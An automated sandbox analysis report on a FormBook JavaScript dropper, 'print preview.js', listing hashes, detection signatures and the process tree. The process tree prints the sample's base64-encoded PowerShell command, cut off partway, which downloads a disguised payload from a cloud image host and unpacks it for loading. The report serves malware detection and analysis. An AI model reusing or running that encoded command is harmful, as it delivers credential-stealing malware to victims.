Edit tour
Windows
Analysis Report
print preview.js
Overview
General Information
| Sample name: | print preview.js |
| Analysis ID: | 1573029 |
| MD5: | 6bdeaa07eecfe3ac683a035cc6862835 |
| SHA1: | a58508f817bb84ae1fd3136bfb19b92d3a851887 |
| SHA256: | 8e036deab10aad80da9d5eb558d660ae76b5321b392ade3973c609c84df85524 |
| Tags: | jsuser-lowmal3 |
| Infos: |   |
 | |
Detection
FormBook
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Paste sharing url in reverse order
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7520 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\print preview.j s" MD5: A47CBE969EA935BDD3AB568BB126BC80) - wscript.exe (PID: 7704 cmdline:
"C:\Window s\System32 \wscript.e xe" C:\Win dows\Temp\ ???7????6? ???2????7. js MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 7760 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ orgiasts = 'aQBmACAA KAAkAG4AdQ BsAGwAIAAt AG4AZQAgAC QAUABTAFYA ZQByAHMAaQ BvAG4AVABh AGIAbABlAC AALQBhAG4A ZAAgACQAUA BTAFYAZQBy AHMAaQBvAG 4AVABhAGIA bABlAC4AUA BTAFYAZQBy AHMAaQBvAG 4AIAAtAG4A ZQAgACQAbg B1AGwAbAAp ACAAewAgAF sAdgBvAGkA ZABdACQAUA BTAFYAZQBy AHMAaQBvAG 4AVABhAGIA bABlAC4AUA BTAFYAZQBy AHMAaQBvAG 4AIAB9ACAA ZQBsAHMAZQ AgAHsAIABX AHIAaQB0AG UALQBPAHUA dABwAHUAdA AgACcAUABv AHcAZQByAF MAaABlAGwA bAAgAHYAZQ ByAHMAaQBv AG4AIABOAG 8AdAAgAGEA dgBhAGkAbA BhAGIAbABl ACcAIAB9AD sAaQBmACAA KAAkAG4AdQ BsAGwAIAAt AG4AZQAgAC QAUABTAFYA ZQByAHMAaQ BvAG4AVABh AGIAbABlAC AALQBhAG4A ZAAgACQAUA BTAFYAZQBy AHMAaQBvAG 4AVABhAGIA bABlAC4AUA BTAFYAZQBy AHMAaQBvAG 4AIAAtAG4A ZQAgACQAbg B1AGwAbAAp ACAAewAgAF sAdgBvAGkA ZABdACQAUA BTAFYAZQBy AHMAaQBvAG 4AVABhAGIA bABlAC4AUA BTAFYAZQBy AHMAaQBvAG 4AIAB9ACAA ZQBsAHMAZQ AgAHsAIABX AHIAaQB0AG UALQBPAHUA dABwAHUAdA AgACcAUABv AHcAZQByAF MAaABlAGwA bAAgAHYAZQ ByAHMAaQBv AG4AIABOAG 8AdAAgAGEA dgBhAGkAbA BhAGIAbABl ACcAIAB9AD sAJABsAGUA ZQBjAGgAbA BpAGsAZQAg AD0AIAAnAG gAdAB0AHAA cwA6AC8ALw ByAGUAcwAu AGMAbABvAH UAZABpAG4A YQByAHkALg BjAG8AbQAv AGQAeQB0AG YAbAB0ADYA MQBuAC8AaQ BtAGEAZwBl AC8AdQBwAG wAbwBhAGQA LwB2ADEANw AzADMAMQAz ADQAOQA0AD cALwBiAGsA bABwAHkAcw BlAHkAZQB1 AHQANABpAG 0AcAB3ADUA MABuADEALg BqAHAAZwAg ACcAOwAkAH AAeQByAG8A bQBhAG4AaQ BhAGMAYQBs ACAAPQAgAE 4AZQB3AC0A TwBiAGoAZQ BjAHQAIABT AHkAcwB0AG UAbQAuAE4A ZQB0AC4AVw BlAGIAQwBs AGkAZQBuAH QAOwAkAHMA aABhAHAAZQ ByAHMAIAA9 ACAAJABwAH kAcgBvAG0A YQBuAGkAYQ BjAGEAbAAu AEQAbwB3AG 4AbABvAGEA ZABEAGEAdA BhACgAJABs AGUAZQBjAG gAbABpAGsA ZQApADsAJA B1AG4AZgBh AHQAaABvAG 0AYQBiAGwA ZQAgAD0AIA BbAFMAeQBz AHQAZQBtAC 4AVABlAHgA dAAuAEUAbg BjAG8AZABp AG4AZwBdAD oAOgBVAFQA RgA4AC4ARw BlAHQAUwB0 AHIAaQBuAG cAKAAkAHMA aABhAHAAZQ ByAHMAKQA7 ACQAagBhAH AAYQBuAGkA egBlACAAPQ AgACcAPAA8 AEIAQQBTAE UANgA0AF8A UwBUAEEAUg BUAD4APgAn ADsAJABkAG UAZgBpAG4A ZQAgAD0AIA AnADwAPABC AEEAUwBFAD YANABfAEUA TgBEAD4APg AnADsAJABz AGUAbgB0AG kAbQBlAG4A dABhAGwAaQ BzAG0AcwAg AD0AIAAkAH UAbgBmAGEA dABoAG8AbQ BhAGIAbABl AC4ASQBuAG QAZQB4AE8A ZgAoACQAag BhAHAAYQBu AGkAegBlAC kAOwAkAGIA bwBkAHkAcw B1AHIAZgBz ACAAPQAgAC QAdQBuAGYA YQB0AGgAbw BtAGEAYgBs AGUALgBJAG 4AZABlAHgA TwBmACgAJA BkAGUAZgBp AG4AZQApAD sAJABzAGUA bgB0AGkAbQ BlAG4AdABh AGwAaQBzAG 0AcwAgAC0A ZwBlACAAMA AgAC0AYQBu AGQAIAAkAG IAbwBkAHkA cwB1AHIAZg BzACAALQBn AHQAIAAkAH MAZQBuAHQA aQBtAGUAbg B0AGEAbABp AHMAbQBzAD sAJABzAGUA bgB0AGkAbQ BlAG4AdABh AGwAaQBzAG 0AcwAgACsA PQAgACQAag BhAHAAYQBu AGkAegBlAC 4ATABlAG4A ZwB0AGgAOw AkAGMAcgBl AG4AZQBsAG EAdABlACAA PQAgACQAYg BvAGQAeQBz AHUAcgBmAH MAIAAtACAA JABzAGUAbg B0AGkAbQBl AG4AdABhAG wAaQBzAG0A